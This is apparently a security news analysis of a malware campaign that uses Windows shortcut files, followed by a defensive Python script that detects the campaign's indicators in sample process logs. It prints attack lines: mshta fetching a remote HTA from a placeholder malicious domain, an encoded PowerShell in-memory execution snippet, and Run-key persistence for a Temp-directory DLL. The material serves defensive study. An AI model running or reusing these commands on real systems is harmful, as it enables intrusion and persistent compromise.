A recent surge in cyber threats has brought the spotlight onto a new form of malware that exploits Windows shortcut files, commonly known as .LNK files. This wave of attacks, which emerged in late August 2025, has raised alarms among security teams, as the malware cleverly leverages trusted Microsoft binaries to circumvent endpoint protections and execute malicious payloads without drawing attention.
Primarily disseminated through spear-phishing emails and compromised websites, these shortcut files may appear harmless at first glance. However, they contain embedded commands that invoke legitimate Windows utilities, enabling the retrieval and execution of additional malware components.
Initial reports from victims indicate subtle signs of compromise, including unusual PowerShell calls and unexpected network connections, which are often overlooked as benign system activity. The campaign targets both enterprise and consumer endpoints, with a particular focus on users possessing elevated privileges.
The initial lure of these attacks comes in the form of emails that mimic internal IT notifications or security alerts, prompting recipients to click on what seems to be an innocuous shortcut attachment.
Upon execution, the .LNK file activates Windows Explorer, which loads a hidden payload. This process effectively weaponizes built-in binaries such as mshta.exe and rundll32.exe, facilitating the attack while evading antivirus signatures and behavioral detection rules that typically flag the direct execution of unknown executables.
K7 Security Labs analysts have observed that the attackers meticulously crafted the LNK payload to utilize encoded parameters passed to these native utilities, complicating straightforward analysis by sandbox environments. By chaining multiple benign processes, the malware achieves “living off the land” execution, thereby minimizing its forensic footprint both on disk and in memory.
Victims’ endpoint logs reveal rapid process spawning events, where each process hands off execution to the next stage in less than a second, further complicating detection efforts.
Infection Mechanism and Payload Deployment
Examining the infection mechanism more closely, the malicious .LNK file embeds an OLE object that points to a remote HTML application (HTA) script hosted on a compromised server. When a user double-clicks the shortcut, Explorer invokes mshta.exe with the following command line:
mshta.exe "http[:]//malicious-domain.com/loader.hta"
The obfuscated loader script employs Base64-encoded PowerShell commands to download the next-stage payload:
$payload = 'aGVsbG8gd29ybGQ='
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))
This snippet decodes and executes a simple script from memory, showcasing the attacker’s strategy to minimize disk writes. Once the HTA executes, it utilizes rundll32.exe to load a malicious DLL directly into a suspended svchost.exe process, successfully bypassing executable file scanning.
The DLL is tasked with establishing persistence by creating a Win32 registry run key:
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name "Updater" -Value "rundll32.exe C:\Windows\Temp\updater.dll,EntryPoint"
By exploiting registry-based persistence and trusted Windows binaries, the malware ensures that it launches automatically upon user login, even if endpoint detections attempt to quarantine the DLL file.
Indicators of compromise include network requests to suspicious domains, anomalous mshta.exe and rundll32.exe process trees, and unrecognized registry entries under the CurrentVersion\Run key.
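The indicators above translate directly into detection logic. The following Python script is an added example for defenders, not code from the original report or from K7 Security Labs: it applies those indicators to constructed, Sysmon-style process-creation records and a constructed set of Run-key values. It flags mshta.exe launched with a remote URL, rundll32.exe loading a DLL from a user-writable path, hand-offs between the native utilities named in the article, PowerShell -EncodedCommand arguments that decode to an IEX call, and autorun entries that match the persistence pattern described. The field names (pid, ppid, image, cmdline), the domain malicious-domain.example and the sample values are assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass

# Native utilities the article describes being chained together.
LOLBINS = {"mshta.exe", "rundll32.exe", "powershell.exe"}
CHAIN_CHILDREN = LOLBINS | {"cmd.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories a standard user can write to; a DLL loaded from here by rundll32 is worth a look.
USER_WRITABLE = re.compile(r"\\(Temp|AppData|ProgramData|Downloads|Public)\\", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _enc(ps: str) -> str:
    """Build a PowerShell -EncodedCommand value (UTF-16LE, Base64) for the sample data."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events (assumed Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://malicious-domain.example/loader.hta"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))")},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\Temp\updater.dll,EntryPoint"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Constructed Run-key values as they would be read from HKCU\...\CurrentVersion\Run.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r"rundll32.exe C:\Windows\Temp\updater.dll,EntryPoint",
}


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded text of a PowerShell -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process_tree(events):
    """Apply the article's process-tree indicators to a list of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # mshta.exe fetching a remote HTA is the first stage described in the article.
        if name == "mshta.exe" and URL_RE.search(e["cmdline"]):
            findings.append(Finding(e["pid"], "mshta_remote_hta", f"parent={pname}: {e['cmdline']}"))
        # rundll32.exe loading a DLL from a user-writable directory.
        if name == "rundll32.exe" and USER_WRITABLE.search(e["cmdline"]):
            findings.append(Finding(e["pid"], "rundll32_user_writable_dll", e["cmdline"]))
        # One native utility handing execution to another ("living off the land" chain).
        if pname in LOLBINS and name in CHAIN_CHILDREN:
            findings.append(Finding(e["pid"], "lolbin_chain", f"{pname} -> {name}"))
        # Encoded PowerShell that decodes to an in-memory IEX execution.
        decoded = decode_encoded_command(e["cmdline"])
        if decoded and re.search(r"\b(iex|invoke-expression)\b", decoded, re.IGNORECASE):
            findings.append(Finding(e["pid"], "encoded_iex", decoded))
    return findings


def suspicious_run_values(values):
    """Return names of Run-key values where rundll32/mshta is pointed at a user-writable path."""
    return [
        name for name, value in values.items()
        if re.search(r"\b(rundll32|mshta)(\.exe)?\b", value, re.IGNORECASE)
        and USER_WRITABLE.search(value)
    ]


if __name__ == "__main__":
    for f in analyze_process_tree(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
    print("suspicious Run values:", suspicious_run_values(SAMPLE_RUN_VALUES))
```

On the constructed sample the script flags the mshta.exe launch, both hand-offs (mshta.exe to powershell.exe and powershell.exe to rundll32.exe), the decoded IEX call and the Temp-directory DLL, while the OneDrive autorun passes because it involves neither rundll32 nor mshta. Feeding real Sysmon Event ID 1 records in the same shape is the intended use; the user-writable path list is deliberately narrow and should be extended to the environment's own staging directories.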